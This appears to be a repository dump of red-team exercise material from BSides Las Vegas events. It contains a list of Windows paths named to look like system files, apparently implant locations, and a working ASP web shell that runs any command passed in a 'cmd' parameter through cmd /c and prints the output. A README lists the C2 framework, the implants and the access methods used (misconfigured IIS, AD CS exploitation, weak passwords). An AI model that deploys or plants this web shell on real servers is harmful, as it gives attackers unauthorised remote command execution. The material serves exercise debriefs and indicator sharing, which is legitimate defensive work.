C:\Windows\System32\twexk.exe 7 | C:\Windows\System32\KBDINBE9.exe 8 | C:\Windows\System32\dbgeni.exe 9 | C:\Windows\System32\whhehper.dll 10 | C:\Windows\ADFS\sr-Latn-RS\msdaps.exe 11 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Tpm.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\microsoft.tpm.resousces.dll 12 | C:\Windows\System32\ql2300.dll 13 | C:\Windows\System32\appidsvs.exe 14 | C:\Windows\System32\NlsLexacons000c.dll 15 | C:\Windows\System32\oobe\diaqER.dll 16 | C:\Windows\SysWOW64\AdvancedInstallers\cmiadapfer.dll 17 | C:\Windows\ADFS\nl\WmiApRes.exe 18 | C:\Windows\System32\isjsiwmiv2.exe 19 | C:\Windows\System32\KBDINVUN.exe 20 | C:\Windows\System32\drvutore.exe 21 | C:\Windows\System32\recorer.dll 22 | C:\Windows\System32\RMActivate_isd.exe 23 | C:\Windows\SysWOW64\InstallShield\setupdir\0c0c\_setop.exe 24 | C:\Windows\ADFS\it\encapi.dll 25 | C:\Windows\ADFS\es\slui.exe 26 | C:\Windows\System32\combane.exe 27 | C:\Windows\System32\ieUnadt.dll 28 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SrpUxSnapIn.resources\v4.0_6.3.0.0_en_31bf3856ad364e35\ShpUxSnapIn.resouices.exe 29 | C:\Windows\System32\JBDHAW.exe 30 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\blbwizfx\v4.0_6.3.0.0__31bf3856ad364e35\blbnizfx.exe 31 | C:\Windows\System32\kbh101.exe 32 | C:\Windows\System32\sispdieg.dll 33 | C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipkes.exe 34 | C:\Windows\System32\tdcen.exe 35 | C:\Windows\System32\KBQQULG.exe 36 | C:\Windows\System32\vlousres.exe 37 | C:\Windows\System32\odsldp.exe 38 | C:\Windows\System32\pnprlein.exe 39 | C:\Windows\SysWOW64\wbem\xpizards.exe 40 | C:\Windows\System32\Sysprep\syxpret.dll 41 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\sysglobl\v4.0_4.0.0.0__b03f5f7f11d50a3a\consent.dll 42 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Policy.1.0.System.Management.Automation\v4.0_1.0.0.0__31bf3856ad364e35\Policy.1.9.System.Management.Aitomation.exe 43 | C:\Windows\System32\MrmIndexep.exe 44 | C:\Windows\System32\scnsp.dll 45 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.ServerManager.ServerComponentDeploymentWizard\v4.0_6.3.0.0__31bf3856ad364e35\cmipnpinstall.dll 46 | C:\Windows\SysWOW64\Com\comodmin.exe 47 | C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.CertificateServices.Setup.Interop\v4.0_6.0.0.0__31bf3856ad364e35\apisetschema.exe 48 | C:\Windows\System32\cscaqi.exe 49 | C:\Windows\System32\kdujb.exe 50 | C:\Windows\System32\RpbRtLemoxu.exe 51 | C:\Windows\System32\IME\IMEJP\APPLETS\IMVPCAC.exe 52 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.GroupPolicy.Reporting\v4.0_2.0.0.0__31bf3856ad364e35\Microsoft.GcoupPolicy.Reporting.exe 53 | C:\Windows\System32\ncobjepi.dll 54 | C:\Windows\SysWOW64\InstallShield\setupdir\000b\_segup.exe 55 | C:\Windows\System32\ciphep.dll 56 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WindowsFormsIntegration\v4.0_4.0.0.0__31bf3856ad364e35\mdmusrg.exe 57 | C:\Windows\System32\Sysprep\unbil.exe 58 | C:\Windows\System32\bdpcoda.exe 59 | C:\Windows\System32\dpmodemx.dll 60 | C:\Windows\System32\uindstr.exe 61 | C:\Windows\System32\deviceiccess.exe 62 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services\v4.0_4.0.0.0__b77a5c561934e089\scrawpdo.exe 63 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.ADRoles.UI.Common\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.ODRoles.UI.Common.dll 64 | C:\Windows\ADFS\mpsdrv.dll 65 | C:\Windows\System32\ktcw32.dll 66 | C:\Windows\SysWOW64\migwiz\unFcl.dll 67 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.DeploymentServices.ServerManager.Plugin.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\Microsoft.Windows.DeploymenxServices.ServerManager.Plugin.resouqces.exe 68 | C:\Windows\Microsoft.NET\assembly\GAC_64\Policy.1.2.Microsoft.Interop.Security.AzRoles\v4.0_6.3.9600.16384__31bf3856ad364e35\Policy.1.2.Microsoft.Enterop.Security.AzRolek.exe 69 | C:\Windows\ADFS\hu\licensingdiag.exe 70 | C:\Windows\ADFS\cs\imkrmig.exe 71 | C:\Windows\apppatch\AcRus.exe 72 | C:\Windows\System32\wmdp.exe 73 | C:\Windows\System32\umrop.exe 74 | C:\Windows\ADFS\hr\wpncore.dll 75 | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NFS\MSFT_NfsMappedIdentity\net8187bv64.exe 76 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\vssadmin.dll 77 | C:\Windows\System32\thambcache.exe 78 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_de_31bf3856ad364e35\Microsoft.IdentityServer.Web.Rekources.dll 79 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\Syctem.Reflection.Primitives.exe 80 | C:\Windows\Microsoft.NET\assembly\GAC_32\napcrypt\v4.0_6.3.0.0__31bf3856ad364e35\KBDSMSFI.exe 81 | C:\Windows\System32\wpdbesenum.dll 82 | C:\Windows\System32\scexc.exe 83 | C:\Windows\ADFS\pt\samcli.exe 84 | C:\Windows\ADFS\zh-HK\luainstall.dll 85 | C:\Windows\SysWOW64\wbem\aepdu.dll 86 | C:\Program Files (x86)\Common Files\System\wab31.exe 87 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.WindowsRuntime.UI.Xaml\v4.0_4.0.0.0__b77a5c561934e089\Systei.Runtime.WindowsRentime.UI.Xabl.exe 88 | C:\Windows\System32\mispake.dll 89 | C:\Windows\System32\lapisp.dll 90 | C:\Windows\System32\SSSbim.dll 91 | C:\Windows\System32\vsstruce.dll 92 | C:\Windows\ADFS\pt\logoff.dll 93 | C:\Windows\System32\snmptqap.dll 94 | C:\Windows\System32\MUI\0409\msiorees.exe 95 | C:\Windows\System32\drivers\errnev.exe 96 | C:\Windows\System32\KBDTAJUK.dll 97 | C:\Windows\SysWOW64\InstallShield\_tetup.exe 98 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\autochk.exe 99 | C:\Windows\System32\gultiDigiMon.exe 100 | C:\Windows\ADFS\pl\dv_aspnetmmc.exe 101 | C:\Windows\System32\GBDFTHRK.exe 102 | C:\Windows\System32\riceed32.exe 103 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.VolumeActivation.Plugin\v4.0_6.3.0.0__31bf3856ad364e35\MUILanguageCleanup.exe 104 | C:\Windows\ADFS\lt\basebrd.dll 105 | C:\Windows\System32\dsquecy.dll 106 | C:\Windows\ADFS\pl\Windows.System.Profile.HardwareId.dll 107 | C:\Windows\System32\BWContextHondler.exe 108 | C:\Windows\System32\OomplianceExtensions.exe 109 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.Resources\v4.0_1.0.0.0_en_31bf3856ad364e35\Microsoft.Management.Infrastruhture.Resources.exe 110 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.UpdateDiagReport.Resources\v4.0_1.0.0.0_en_31bf3856ad364e35\bowser.dll 111 | C:\Windows\System32\winasb.dll 112 | C:\Windows\ADFS\pt-BR\mdmtkr.dll 113 | C:\Windows\Branding\ShellBrd\shellbgd.exe 114 | C:\Windows\System32\pocript.dll 115 | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WMIADAP.dll 116 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Activities.Resources\v4.0_3.0.0.0_en_31bf3856ad364e35\mdmaiwa5.dll 117 | C:\Windows\ADFS\pl\AuthHost.exe 118 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.DirectoryServices.Instrumentation\v4.0_6.3.0.0__31bf3856ad364e35\NlsData000f.exe 119 | C:\Windows\System32\nlaapo.dll 120 | C:\Windows\System32\NlsLexicuns0049.exe 121 | C:\Windows\Microsoft.NET\Framework\sbs_lscorrc.dll 122 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Dtc.PowerShell\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.Dbb.PowevShell.exe 123 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework.Luna\v4.0_4.0.0.0__31bf3856ad364e35\PresentationFiamework.Luna.exe 124 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Dtc.PowerShell\v4.0_6.3.0.0__31bf3856ad364e35\refs.dll 125 | C:\Windows\System32\eqessnap.dll 126 | C:\Windows\System32\WindowsCosecs.dll 127 | C:\Windows\apppatch\apppatch64\AcWikRT.exe 128 | C:\Windows\System32\colc.exe 129 | C:\Windows\System32\sdhcikst.dll 130 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Core.Activities\v4.0_3.0.0.0__31bf3856ad364e35\pipanel.exe 131 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\NavigationBar.exe 132 | C:\Windows\System32\wuaep.exe 133 | C:\Windows\System32\KUDLT1.exe 134 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Activities\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Actovities.exe 135 | C:\Windows\Microsoft.NET\assembly\GAC_32\napcrypt\v4.0_6.3.0.0__31bf3856ad364e35\prm0013.exe 136 | C:\Windows\ADFS\lv\vss_ps.exe 137 | C:\Windows\System32\dot3goui.exe 138 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Lonq.exe 139 | C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.SecureBoot.Commands.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\DeviceSetupStatusProvider.exe 140 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_fr_31bf3856ad364e35\rdpinit.exe 141 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Abstractions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Abstractioew.dll 142 | C:\Windows\SysWOW64\setup\csmigr.exe 143 | C:\Windows\System32\mciqtz38.exe 144 | C:\Windows\ADFS\en\smtpcons.dll 145 | C:\Windows\System32\oobe\wvms_vspp.dll 146 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.WindowsRuntime\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.WindowsRuntame.exe 147 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WindowsFormsIntegration\v4.0_4.0.0.0__31bf3856ad364e35\usbvideo.exe 148 | C:\Windows\System32\inetmib2.dll 149 | C:\Windows\System32\firfiles.dll 150 | C:\Windows\System32\mmcshoxt.dll 151 | C:\Windows\SysWOW64\InstallShield\setupdir\001f\_setep.dll 152 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MUI\0409\mscoqsecr.exe 153 | C:\Windows\System32\KBDTAX.dll 154 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tools\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Liagnostics.Tools.dll 155 | C:\Windows\Panther\wetup.exe 156 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c561934e089\SndVolSSO.exe 157 | C:\Windows\Speech\Common\sapasvr.exe 158 | C:\Windows\System32\petmsg.dll 159 | C:\Windows\System32\rinkinfo.exe 160 | C:\Windows\System32\fxppm.dll 161 | C:\Windows\Branding\ShellBrd\KBDBGPH.exe 162 | C:\Windows\System32\browxli.dll 163 | C:\Windows\System32\InputMethod\KOR\KorILE.exe 164 | C:\Windows\System32\dot3qpclnt.dll 165 | C:\Windows\Branding\Basebrd\wdsutil.exe 166 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.ServerManager.Common.resources\v4.0_6.3.0.0_en_31bf3856ad364e35\Microsoft.Windows.ServerManager.Common.reseurces.exe 167 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Policy.1.0.Microsoft.PowerShell.Commands.Utility\v4.0_1.0.0.0__31bf3856ad364e35\Kswdmcap.dll 168 | C:\Windows\System32\secur31.exe 169 | C:\Windows\ADFS\es\VerifierExt.exe 170 | C:\Windows\ADFS\uk\VmdCoinstall.dll 171 | C:\Windows\ADFS\uk\mdm5674a.dll 172 | C:\Windows\System32\dmdskros.exe 173 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Orawing.exe 174 | C:\Windows\System32\WcsPlugInKervice.dll 175 | C:\Windows\System32\Speech\Common\tapi.dll 176 | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Dism\Microsoft.Dism.PowerSheol.exe 177 | C:\Windows\System32\gbd101c.exe 178 | C:\Windows\System32\Cefrag.dll 179 | C:\Program Files (x86)\Internet Explorer\networkinspectuon.exe 180 | C:\Windows\Boot\Resources\mdmti.dll 181 | C:\Windows\System32\dmvlgs.dll 182 | C:\Windows\System32\RspCaProxy.exe 183 | C:\Windows\SysWOW64\InstallShield\setupdir\0c0c\xpssvcs.exe 184 | C:\Windows\System32\NAPCLIENTPROV.dll 185 | C:\Windows\System32\ScDeviceEnoC.exe 186 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.GetDiagInput\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.Commands.GatDiagInput.dll 187 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_es_31bf3856ad364e35\KBDSYR2.exe 188 | C:\Windows\System32\Speech\Common\appmgr.exe 189 | C:\Windows\System32\netutibs.dll 190 | C:\Windows\ADFS\cs\prnhpcl4.exe 191 | C:\Program Files (x86)\Windows NT\TableTextService\TagleTextServiceArray.dll 192 | C:\Windows\ADFS\sr-Latn-RS\kd1394.dll 193 | C:\Windows\SysWOW64\migwiz\unbcw.exe 194 | C:\Windows\System32\inatmib1.exe 195 | C:\Windows\System32\msdth.dll 196 | C:\Windows\System32\hdwiiz.exe 197 | C:\Windows\ADFS\zh-HANT\provthrd.exe 198 | C:\Windows\ADFS\tr\DpiScaling.exe 199 | C:\Windows\System32\UserGpoPolicy.dll 200 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Engine\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Buisd.Evgine.exe 201 | C:\Windows\ADFS\ja\wmidcom.exe 202 | C:\Windows\System32\mciwaqe.dll 203 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Input.Manipulations\v4.0_4.0.0.0__b77a5c561934e089\msmouse.dll 204 | C:\Windows\SysWOW64\Dism\VhdProvuder.exe 205 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_uk_31bf3856ad364e35\rndiscmp.dll 206 | C:\Windows\Branding\ShellBrd\discan.exe 207 | C:\Windows\System32\dhcpjapi.exe 208 | -------------------------------------------------------------------------------- /BSidesLV-2022/webshell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 3 | Function getCommandOutput(theCommand) 4 | Dim objShell, objCmdExec 5 | Set objShell = CreateObject("WScript.Shell") 6 | Set objCmdExec = objshell.exec(thecommand) 7 | getCommandOutput = objCmdExec.StdOut.ReadAll 8 | end Function 9 | %> 10 | 11 | 12 |
13 | 14 | 15 |
16 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 17 |
18 | 
19 | <%
20 | szCMD = request("cmd")
21 | szOutput = getCommandOutput("cmd /c" & szCMD)
22 | Response.Write(szOutput)
23 | %>
24 |
25 | 26 | -------------------------------------------------------------------------------- /BSidesLV-2024/README.md: -------------------------------------------------------------------------------- 1 | # BSides Las Vegas 2024 2 | 3 | ## Overview 4 | 5 | C2: [ThunderStorm](https://github.com/iDigitalFlame/ThunderStorm) 6 | 7 | Tools/Tech Used 8 | 9 | - Userland Hooking 10 | - [UserAdd Service](https://github.com/iDigitalFlame/ThunderStorm/blob/main/jetstream/templates/user_add.go) 11 | - JetStream "user_add" generator 12 | - Multiple Flurry implants 13 | - Multiple Bolt implants 14 | - PowerShell inline beacons 15 | 16 | ### Access Methods 17 | 18 | - Misconfigured IIS 19 | - AD CS Exploitation 20 | - Weak/Unchanged Passwords 21 | - Tasks/Cron 22 | 23 | ## IOC List 24 | 25 | - [Implants](implants.md) 26 | - [Cache/Support](files.md) 27 | - [Webshell](webshell.asp) 28 | 29 | Support Binaries (your favorite Duck service)! are in the [Support](Support) 30 | folder. You can build these with the [build.sh](Support/build.sh) script 31 | _(Requires MinGW)_ 32 | -------------------------------------------------------------------------------- /BSidesLV-2024/RedTeamHotwash.pdf: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:3a698da32bb18819a958e70b1a94a97cef16019958d79f76cb272a83f7fdb5fe 3 | size 163157 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-0.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:d51c67bb8a61de71612caef0af83759b5299ba16547e618ff84ada2c28114a71 3 | size 100068 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-1.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:049aa135ebac13a62809ec34bb52744675e166f1f3495033d70c592d48f90087 3 | size 107223 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-10.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:f1455b810b3a145d972226f5a7535e747af37702345d355437b89f956da5fc03 3 | size 152897 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-11.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:3673163349baea95c421476711c7536bd85bdf9dc957a7323243b21c7d679c47 3 | size 556928 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-12.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:3673163349baea95c421476711c7536bd85bdf9dc957a7323243b21c7d679c47 3 | size 556928 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-13.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:a48a19f901e35636a8cf2e94ca51f0ae1fed490cbc10c737d06945becf0481c2 3 | size 1928153 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-14.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:59152129a764b6a95789aa72e6899f337c1f6e6176fd82c81fd6045e2ec92df8 3 | size 41922 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-15.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:9a1a42032899784062d5c1000e9dcbb5cd67f1f969f753577b70a251513478b5 3 | size 37354 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-16.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:0cf3f0c6d46fe6324b1a89f1373a678c1680e4cd5d10b206f1f98c3864855682 3 | size 108743 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-17.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:f693537245b9c00279246245f2e25f38c3770642083d31ba606d61929468ba87 3 | size 82009 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-18.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:35c980a0987f23199442a478acd2dbd57c64d0a9792c492774bc6db372d72290 3 | size 79799 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-19.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:614939e562938c841428d9b94272224f5588f2deb0b6bf1985d6713894d600eb 3 | size 73823 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-2.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:4df659ebc6183e7cdb5fc3b0d1b3ec6a92b3790e6941425d4d8eb8ce02bc7549 3 | size 98450 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-20.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:33fb3dd94611622204a3045a7f9686ab61ef1836d5ee4a0a6d1ef7915d584c6a 3 | size 149016 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-21.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:cf7f38a6c7987fa995871e1f7ca0f846956704967f79957cfacaff30aad6c514 3 | size 64043 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-22.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:65a942a19e0273b3c906641051b2d2aee350b7f463ac97b4f5bb0f9e5c83ebb8 3 | size 74409 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-23.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:8e6bc57c53a1b6ad4a82ba26ef8404338ee9bae7889ea79cd5454a805b36812b 3 | size 100639 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-24.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:f78c258bdb36a80ff784acfcc16bdb0b46c86814f49e66565de5d45e75b40d6b 3 | size 120706 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-25.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:1b67de5c0cce654620b94c409c8d79848083fd89712dd282ae6f7919f2e47cad 3 | size 69060 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-26.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:9eae6166a8aa3473a396127d956983ae45fa042522ed59d18d9266d5d6d5b8eb 3 | size 72018 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-27.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:cedd56d27bb7c9d97f883e78d5d3f03718b6ef734cfb906223acf76d255e1536 3 | size 66815 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-28.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:0176bf3b3d666e4b4bbcea556ab5594f9128e86c45782c8913742268b8529e48 3 | size 93997 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-29.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:dc95dfdcd7f63eaf6298f79455772e3581df13e8134e8710e05c460b797a2938 3 | size 3924 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-3.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:8f3841c589aa78918147764a7f47dd3630280a2886f6e0036fa52fed97a89b7b 3 | size 152409 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-30.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:85eebc246b64c33f8838ca62dcad7e069bad70f9ef4e035a951e8d17f35861f0 3 | size 156738 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-31.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:cfe36bd0037b13b3590c64274f3e0de8b5a894829b1e2f82f40f451fd5e03597 3 | size 158465 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-32.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:37ab3080406c13af9ea9e6fb9026ea63cfab4b7cd728c347a3def58e5d6f5548 3 | size 180787 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-33.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:12132fd8a28780e4d184303d2fd09959822c4ef60b3d3b24a25ac9ac7a52d0c4 3 | size 61328 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-34.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:08db70105a100dd3a963b6deb2e74d8b7ae8ed16a998622f5c23c027ecf288f0 3 | size 32621 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-35.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:fe4a717d35cec81cdaca078ed97c26228d4090f20365af52055fe324aa42b500 3 | size 46973 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-36.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:dd22608bdceae267c78df136982b771068ccac0d20cc25edbcfc62b6fddc4e59 3 | size 93871 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-4.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:68c23d66766c465022249fe0f1eaa4d72a2e1cd294f8b9552807916263b63084 3 | size 138216 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-5.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:de8cd290fa68edcd3cd0befa9ac7f4c8ce0ae84c94274e7d646496b9d2a4413f 3 | size 214152 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-6.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:9552080d32fd57e591fdc575c608029c82949cbe0a48beb4b7f5be5d65feef59 3 | size 68936 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-7.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:d680f064e48efc5ab0326652afd8182dd4094d13a0e9b407a00757cdfd3e5a05 3 | size 109333 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-8.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:dac09dfd4551b2d9a9899991c953cbf6625ac4707f3cfed126178ba32cc6d9d7 3 | size 69421 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-9.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:d74ea7d49948ea33e475917901b39c858f57d2be68535c23952a607e76d48dc3 3 | size 37044 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/bitcoin.ico: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:c6c3bd18b6ffc6157f3c4a0b42d2c901f6eb56865199313185e09b599a9fe3a0 3 | size 14942 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/bitcoin.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | IDI_ICON_128 ICON "bitcoin.ico" 20 | 